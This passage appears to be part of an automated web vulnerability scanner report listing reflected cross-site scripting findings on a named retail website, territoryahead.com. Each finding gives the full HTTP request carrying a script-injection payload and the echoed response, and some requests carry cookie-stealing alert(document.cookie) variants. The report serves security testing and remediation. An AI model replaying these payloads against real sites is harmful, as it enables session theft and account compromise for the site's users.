ETag: "AAAAS53+kBZ"
Last-Modified: Wed, 02 Mar 2011 19:10:12 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3lNp9awSrSgAAB1MkM4AAAAZ
REDIRECT_SCRIPT_URL: /text/js7c6fe--><script>alert(1)</script>ab2c0cac3d8/sitedisplay.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js7c6fe-->
...[SNIP]...

1.63. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/sitedisplay.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 7c9ed--><script>alert(1)</script>d8f15372507 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/sitedisplay.js7c9ed--><script>alert(1)</script>d8f15372507 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:51 GMT
Server: Apache
ETag: "AAAAS53+kZo"
Last-Modified: Wed, 02 Mar 2011 19:10:14 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vbzlhawSrRQAAG-7D1EAAAAT
REDIRECT_SCRIPT_URL: /text/js/sitedisplay.js7c9ed--><script>alert(1)</script>d8f15372507
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/sitedisplay.js7c9ed-->
...[SNIP]...

1.64. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/omniture/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 62698--><script>alert(1)</script>8076ec07611 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text62698--><script>alert(1)</script>8076ec07611/omniture/s_code.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:26 GMT
Server: Apache
ETag: "AAAAS53+5qY"
Last-Modified: Wed, 02 Mar 2011 19:11:41 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 45vQ3qwSrSgAAGR-5scAAAAH
REDIRECT_SCRIPT_URL: /text62698--><script>alert(1)</script>8076ec07611/omniture/s_code.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text62698-->
...[SNIP]...

1.65. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/omniture/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 74faf--><script>alert(1)</script>785d6938d76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/omniture74faf--><script>alert(1)</script>785d6938d76/s_code.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:28 GMT
Server: Apache
ETag: "AAAAS53+6Hx"
Last-Modified: Wed, 02 Mar 2011 19:11:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 47iWaKwSrSgAAFMeKa0AAAFF
REDIRECT_SCRIPT_URL: /text/omniture74faf--><script>alert(1)</script>785d6938d76/s_code.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/omniture74faf-->
...[SNIP]...

1.66. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/omniture/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 907ac--><script>alert(1)</script>6515f40b254 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/omniture/s_code.js907ac--><script>alert(1)</script>6515f40b254 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:34 GMT
Server: Apache
ETag: "AAAAS53+7fl"
Last-Modified: Wed, 02 Mar 2011 19:11:48 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5A5r1KwSrSgAAGQksdcAAAAa
REDIRECT_SCRIPT_URL: /text/omniture/s_code.js907ac--><script>alert(1)</script>6515f40b254
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/omniture/s_code.js907ac-->
...[SNIP]...

1.67. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 30035--><script>alert(1)</script>5f4600ac95a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account30035--><script>alert(1)</script>5f4600ac95a/login/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: http://www.territoryahead.com/favicon.ico91103--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2be08184f36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-; cmTPSet=Y; CoreID6=82806333286612990907467&ci=90232094; PS_ALL=%23ps_catid%7EHome; s_cc=true; 90232094_clogin=l=1299090746&v=1&e=1299093001248; cmRS=&t1=1299091179656&t2=1299091191551&t3=1299091201246&t4=1299091176856&lti=1299091201245&ln=&hr=https%3A//www.territoryahead.com/account/login/loginmain.jsp&fti=&fn=searchForm%3A0%3BfooterJoinform%3A1%3B&ac=&fd=&uer=&fu=&pi=ERROR&ho=data.coremetrics.com/eluminate%3F&ci=90232094&ul=http%3A//www.territoryahead.com/favicon.ico91103--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E2be08184f36&rf=http%3A//burp/show/5&cjen=1; s_sq=mlTTAprod%3D%2526pid%253Dhttp%25253A//www.territoryahead.com/favicon.ico91103--%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Mar 2011 18:50:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 38597


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
kie%252529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA
UNIQUE_ID: YiVLHKwSrSgAAB1Eii8AAAAO
SCRIPT_URL: /account30035--><script>alert(1)</script>5f4600ac95a/login/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account30035-->
...[SNIP]...

1.68. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 94610--><script>alert(1)</script>df05338b2d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login94610--><script>alert(1)</script>df05338b2d8/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: http://www.territoryahead.com/favicon.ico91103--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2be08184f36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-; cmTPSet=Y; CoreID6=82806333286612990907467&ci=90232094; PS_ALL=%23ps_catid%7EHome; s_cc=true; 90232094_clogin=l=1299090746&v=1&e=1299093001248; cmRS=&t1=1299091179656&t2=1299091191551&t3=1299091201246&t4=1299091176856&lti=1299091201245&ln=&hr=https%3A//www.territoryahead.com/account/login/loginmain.jsp&fti=&fn=searchForm%3A0%3BfooterJoinform%3A1%3B&ac=&fd=&uer=&fu=&pi=ERROR&ho=data.coremetrics.com/eluminate%3F&ci=90232094&ul=http%3A//www.territoryahead.com/favicon.ico91103--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E2be08184f36&rf=http%3A//burp/show/5&cjen=1; s_sq=mlTTAprod%3D%2526pid%253Dhttp%25253A//www.territoryahead.com/favicon.ico91103--%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Mar 2011 18:41:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 38597


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
2529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA
UNIQUE_ID: QYTkXKwSrRQAAG-4DT8AAAAE
SCRIPT_URL: /account/login94610--><script>alert(1)</script>df05338b2d8/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account/login94610-->
...[SNIP]...

1.69. https://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 143ec--><script>alert(1)</script>3bb93c8afddf317e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates143ec--><script>alert(1)</script>3bb93c8afddf317e4/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Mar 2011 18:51:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
gzip, deflate
Connection: Keep-Alive
UNIQUE_ID: ZUsW8qwSrSgAAB1KjhMAAAAP
nokeepalive: 1
ssl-unclean-shutdown: 1
downgrade-1.0: 1
force-response-1.0: 1
SCRIPT_URL: /templates143ec--><script>alert(1)</script>3bb93c8afddf317e4/custservcontactus.jsp
SCRIPT_URI: https://www.territoryahead.com/templates143ec-->
...[SNIP]...

1.70. https://www.territoryahead.com/templates/custservcontactus.jsp [itemID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 84835--><script>alert(1)</script>2aae3027ec1de6e58 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=23684835--><script>alert(1)</script>2aae3027ec1de6e58&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:50:53 GMT
Server: Apache
ETag: "AAAAS533mWw"
Last-Modified: Wed, 02 Mar 2011 18:39:47 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380355; Path=/; Expires=Wed, 16-Mar-2011 18:39:47 GMT
Set-Cookie: customer=92644100; Path=/; Expires=Thu, 28-Feb-2019 18:39:47 GMT
Set-Cookie: mmlID=68408630; Path=/; Expires=Thu, 28-Feb-2019 18:39:47 GMT
Set-Cookie: JSESSIONID=dwln09Wlx6w6; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
om/errorhandler.jsp?ruleID=8&ruleID=145&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=145&itemID=23684835--><script>alert(1)</script>2aae3027ec1de6e58&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: none
Parameters:
submit.y = 13
submit.y = 13
ruleID = 8
ruleID = 145

...[SNIP]...

1.71. https://www.territoryahead.com/templates/custservcontactus.jsp [itemType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the itemType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8dd3"><script>alert(1)</script>07f711dd67d483f2 was submitted in the itemType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORYf8dd3"><script>alert(1)</script>07f711dd67d483f2&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:50:54 GMT
Server: Apache
ETag: "AAAAS533XVr"
Last-Modified: Wed, 02 Mar 2011 18:38:45 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380271; Path=/; Expires=Wed, 16-Mar-2011 18:38:45 GMT
Set-Cookie: customer=92644146; Path=/; Expires=Thu, 28-Feb-2019 18:38:45 GMT
Set-Cookie: mmlID=68408383; Path=/; Expires=Thu, 28-Feb-2019 18:38:45 GMT
Set-Cookie: JSESSIONID=cCdnbeGWFQtg; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORYf8dd3"><script>alert(1)</script>07f711dd67d483f2&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.72. https://www.territoryahead.com/templates/custservcontactus.jsp [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the path request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5e5"><script>alert(1)</script>42b219da0455ce10c was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2363c5e5"><script>alert(1)</script>42b219da0455ce10c&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:41:47 GMT
Server: Apache
ETag: "AAAAS533kz8"
Last-Modified: Wed, 02 Mar 2011 18:39:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380183; Path=/; Expires=Wed, 16-Mar-2011 18:39:40 GMT
Set-Cookie: customer=92644206; Path=/; Expires=Thu, 28-Feb-2019 18:39:40 GMT
Set-Cookie: mmlID=68408712; Path=/; Expires=Thu, 28-Feb-2019 18:39:40 GMT
Set-Cookie: JSESSIONID=ans7iWspjaG-; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2363c5e5"><script>alert(1)</script>42b219da0455ce10c&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.73. https://www.territoryahead.com/templates/custservcontactus.jsp [ruleID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the ruleID request parameter is copied into an HTML comment. The payload 63790--><script>alert(1)</script>cb37172ac7cff2f60 was submitted in the ruleID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=14563790--><script>alert(1)</script>cb37172ac7cff2f60&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:41:43 GMT
Server: Apache
ETag: "AAAAS533WtZ"
Last-Modified: Wed, 02 Mar 2011 18:38:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380270; Path=/; Expires=Wed, 16-Mar-2011 18:38:42 GMT
Set-Cookie: customer=92644145; Path=/; Expires=Thu, 28-Feb-2019 18:38:42 GMT
Set-Cookie: mmlID=68408382; Path=/; Expires=Thu, 28-Feb-2019 18:38:42 GMT
Set-Cookie: JSESSIONID=ckFN2dMN8sd8; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ipt%3Ealert%281%29%3C%2Fscript%3Ecb37172ac7cff2f60&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=14563790--><script>alert(1)</script>cb37172ac7cff2f60&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: none
Parameters:
submit.y = 13
submit.y = 13
ruleID = 8
rul
...[SNIP]...
